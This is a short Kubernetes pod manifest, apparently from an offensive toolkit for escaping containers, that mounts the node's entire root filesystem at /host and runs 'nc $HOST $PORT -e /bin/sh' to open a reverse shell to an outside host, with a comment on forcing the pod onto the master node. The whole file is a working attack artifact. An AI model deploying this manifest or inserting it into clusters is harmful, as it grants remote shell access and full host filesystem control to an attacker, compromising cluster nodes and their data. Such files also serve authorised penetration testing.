###########################################################
## Deploy: kubectl -n [namespace] apply -f pod-hostpath-only.yaml 
## Access: kubectl -n [namespace] exec -it pod-hostpath -- bash
## Remove: kubectl -n [namespace] delete -f pod-hostpath-only.yaml
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-hostpath
  labels:
    app: hostpath
spec:
  containers:
  - name: hostpath
    image: busybox
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "nc $HOST $PORT  -e /bin/sh;" ]
  # Force scheduling of your pod on master mode by uncommenting this line and changing the name
  #nodeName: k8s-master
  volumes:
  - name: noderoot
    hostPath:
      path: /